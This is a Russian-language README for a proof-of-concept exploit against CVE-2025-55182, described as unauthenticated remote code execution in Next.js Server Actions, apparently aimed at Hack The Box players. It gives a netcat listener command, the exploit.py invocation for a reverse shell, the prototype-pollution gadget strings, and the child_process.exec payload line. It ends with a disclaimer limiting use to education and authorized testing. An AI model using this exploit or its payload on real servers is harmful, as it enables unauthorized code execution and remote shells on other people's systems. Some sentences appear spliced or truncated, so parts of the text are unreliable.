
Я знаю, что вы, скорее всего, пришли сюда с Hack the Box, и если так, то да, этот действительно работает.
Эксплойт proof-of-concept (PoC) для CVE-2025-55182, нацеленный на неаутентифицированную уязвимость удалённого выполнения кода (RCE) в Next.js Server Actions.
Этот эксплойт использует загрязнение прототипа (prototype pollution) во время десериализации multipart-полезных нагрузок React Server Components (RSC), чтобы внедрить вредоносные команды в процесс Node.js с помощью асинхронного, неблокирующего потока выполнения.
child_process.exec() вместо блокирующих API execSync(), чтобы предотвратить зависание потоков на контейнерных узлах.requests.Откройте терминал на вашем атакующем хосте и запустите netcat-прослушиватель для приёма входящего обратного соединения:
nc -lvnp 4444
Укажите базовый URL цели, IP-адрес вашего локального интерфейса и желаемый порт прослушивателя:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
Скрипт отправляет сформированную сырую multipart-полезную нагрузку непосредственно на конечную точку маршрутизации приложения с требуемым заголовком маршрутизации Next-Action.
Используя сигнатуры конструктора объектов через {"get":"$1:constructor:constructor"}, движок десериализации загрязняет нативное дерево объектов. При обработке сопутствующих параметров он интерпретирует вредоносно внедрённый блок контекста _response как очередь инструкций, что позволяет выполнять код с привилегиями контекста пользователя запущенного Node-сервера.
// Базовый вектор цели:
process.mainModule.require('child_process').exec('your_payload_here');
Этот скрипт создан строго в образовательных целях, для авторизованного тестирования безопасности и захвата уязвимых флагов на лабораторных площадках, таких как Hack The Box. Автор не несёт ответственности за любое неправомерное использование, несанкционированное вторжение в системы или ущерб, причинённый данным инструментом.